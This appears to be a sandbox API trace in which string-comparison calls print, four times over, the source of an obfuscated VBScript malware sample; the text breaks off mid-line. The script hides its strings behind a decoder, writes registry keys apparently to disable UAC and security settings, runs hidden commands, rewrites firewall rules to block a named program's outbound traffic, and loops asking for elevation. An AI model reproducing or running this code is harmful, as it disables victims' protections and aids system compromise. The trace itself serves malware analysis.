bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.971] wcsncmp (_String1="d \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.971] wcsncmp (_String1=" \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.971] wcsncmp (_String1="\r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0222.971] wcsncmp (_String1="\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 